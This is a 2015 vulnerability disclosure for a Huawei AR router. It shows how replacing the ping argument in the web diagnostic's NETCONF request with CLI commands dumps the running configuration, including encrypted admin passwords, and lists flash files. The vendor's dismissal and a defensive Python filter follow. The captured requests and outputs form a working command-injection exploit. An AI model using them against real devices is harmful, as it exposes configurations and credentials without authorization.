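2015-06-02: Details reported to the vendor; awaiting vendor handling
2015-06-06: The vendor actively ignored the vulnerability; details disclosed to the public
The school received a batch of routers. I didn't know how to configure them, so I tested them a bit.
There is this function: System Management > Diagnostics > Ping
Captured the request: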
POST http://192.168.1.119/view/main/config.cgi HTTP/1.1
Host: 192.168.1.119
Connection: keep-alive
Content-Length: 372
Origin: http://192.168.1.119
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/41.0.2272.76 Chrome/41.0.2272.76 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://192.168.1.119/view/main/default.html?Version=1.2
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: HttpWarnFlg=no; AR=AR; ARlanguage=property-zh_CN.js; userName=admin; ResetFlag=0; HttpWarnFlg=no

SessionID=M1iBvH1s0kak71m1qqL4YFpG7iW5dxin&MessageID=280&<rpc message-id="280" xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"><edit-config operation="merge"><target><running/></target><error-option>stop-on-error</error-option><config><featurename istop="true" type="cli"><quit></quit><ping>192.168.1.1</ping></featurename></config></edit-config></rpc>]]>]]>
Change <ping>192.168.1.1</ping> to <display>current-configuration</display>. Returned content:
HTTP/1.1 200 OK
Server: AR
Date: tue, 02 jun 2015 10:29:11 GMT
Content-Type: text/xml
Content-Length: 1402
Set-Cookie: HttpWarnFlg=no; AR=AR; ARlanguage=property-zh_CN.js; userName=admin; ResetFlag=0; HttpWarnFlg=no
Connection: Close

<?xml version="1.0"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="280"> <ok/></rpc-reply>
[V200R005C10SPC500]
#
 drop illegal-mac alarm
#
 wlan ac-global carrier id other ac id 0
#
pki realm default
 enrollment self-signed
#
aaa
 authentication-scheme default
 authorization-scheme default
 accounting-scheme default
 domain default
 domain default_admin
 local-user admin password irreversible-cipher %@%@o~ho0DSI#)c&'+VR0uq2.fN8Hp:0#&|@-6h~GlN!:z~CfN;.%@%@
 local-user admin privilege level 3
 local-user admin service-type telnet web http
#
firewall zone Local
 priority 16
#
interface Ethernet0/0/0
#
interface Ethernet0/0/1
#
interface Ethernet0/0/2
#
interface Ethernet0/0/3
#
interface Ethernet0/0/4
#
interface Ethernet0/0/5
#
interface Ethernet0/0/6
#
interface Ethernet0/0/7
#
interface GigabitEthernet0/0/0
#
interface GigabitEthernet0/0/1
 ip address 192.168.1.119 255.255.255.0
#
interface Cellular0/0/0
#
interface Cellular0/0/1
#
interface NULL0
#
 snmp-agent local-engineid 800007DB0330D17EED3C03
#
 http server enable
 http secure-server enable
#
user-interface con 0
 authentication-mode password
 set authentication password cipher %@%@C;@(!jYWE$qrE5"Q`q>7,7x)$I7.F$3jZ'IHQjB"E^|O7x,,%@%@
user-interface vty 0 4
 authentication-mode aaa
#
wlan ac
#
voice
#
 diagnose
#
return
<dir></dir>

HTTP/1.1 200 OK
Server: AR
Date: tue, 02 jun 2015 10:30:29 GMT
Content-Type: text/xml
Content-Length: 917
Set-Cookie: HttpWarnFlg=no; AR=AR; ARlanguage=property-zh_CN.js; userName=admin; ResetFlag=0; HttpWarnFlg=no
Connection: Close

<?xml version="1.0"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="280"> <ok/></rpc-reply>
Directory of flash:/

  Idx  Attr     Size(Byte)  Date        Time(LMT)  FileName
    0  -rw-        304,700  Mar 27 2015 15:22:32   sacrule.dat
    1  -rw-          3,850  Jun 02 2015 07:30:07   mon_file.txt
    2  -rw-    111,630,208  Jun 11 2014 03:05:56   AR1220F-V200R005C10SPC500.cc
    3  -rw-              0  Mar 27 2015 15:21:58   brdxpon_snmp_cfg.efs
    4  -rw-            694  Mar 30 2015 15:25:26   vrpcfg.zip
    5  -rw-            396  Mar 30 2015 15:25:26   private-data.txt
    6  drw-              -  Jun 11 2014 12:28:36   dhcp
    7  drw-              -  Jun 11 2014 12:28:38   security
    8  -rw-          1,260  Jun 11 2014 12:29:28   rsa_host_key.efs
    9  -rw-            540  Jun 11 2014 12:29:32   rsa_server_key.efs

510,484 KB total (401,132 KB free)
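You are the professionals here..
Severity: No impact, ignored by vendor
Ignored at: 2015-06-06 08:14
Thank you to the white hat for your attention to Huawei's security. After confirmation, this permission is the default permission of a logged-in user. It is not a vulnerability.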
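Added example (not part of the original report, and not Huawei's code): the captured POST body carries CLI commands as child elements of <featurename type="cli">, so a reviewer of proxy logs or a filter in front of config.cgi can list those elements and flag anything the Ping page has no reason to send. The function names, the allowlist policy (ping accepts only an IP literal) and the sample body with its placeholder SessionID are assumptions.

```python
import ipaddress
import xml.etree.ElementTree as ET

NS = "{urn:ietf:params:xml:ns:netconf:base:1.0}"
EOM = "]]>]]>"  # end-of-message marker that closes the captured body

# Constructed sample body modelled on the captured request; SessionID is a placeholder.
SAMPLE = ('SessionID=PLACEHOLDER&MessageID=280&<rpc message-id="280" '
          'xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">'
          '<edit-config operation="merge"><target><running/></target>'
          '<error-option>stop-on-error</error-option><config>'
          '<featurename istop="true" type="cli"><quit></quit>{}</featurename>'
          '</config></edit-config></rpc>]]>]]>')

def cli_commands(body):
    """Return [(command, argument)] for each child of <featurename type="cli">."""
    start = body.find("<rpc")
    if start < 0:
        raise ValueError("no <rpc> element in body")
    xml = body[start:].split(EOM, 1)[0]
    if "<!DOCTYPE" in xml or "<!ENTITY" in xml:
        raise ValueError("DTD not accepted")  # refuse entity declarations before parsing
    cmds = []
    for feat in ET.fromstring(xml).iter(NS + "featurename"):
        if feat.get("type") == "cli":
            for child in feat:
                cmds.append((child.tag.replace(NS, ""), (child.text or "").strip()))
    return cmds

def _is_ip(arg):
    try:
        ipaddress.ip_address(arg)
        return True
    except ValueError:
        return False

# Assumed policy for the Ping page: <quit/> with no argument, <ping> with an IP literal.
ALLOWED = {"quit": lambda arg: arg == "", "ping": _is_ip}

def violations(body):
    """Return the (command, argument) pairs the Ping page has no reason to send."""
    bad = []
    for cmd, arg in cli_commands(body):
        check = ALLOWED.get(cmd)
        if check is None or not check(arg):
            bad.append((cmd, arg))
    return bad

if __name__ == "__main__":
    for inner in ("<ping>192.168.1.1</ping>", "<display>current-configuration</display>", "<dir></dir>"):
        print(inner, "->", violations(SAMPLE.format(inner)))
```

The same check applied on the device side, per page and per user privilege level, is what would keep the Ping form from acting as a general CLI channel.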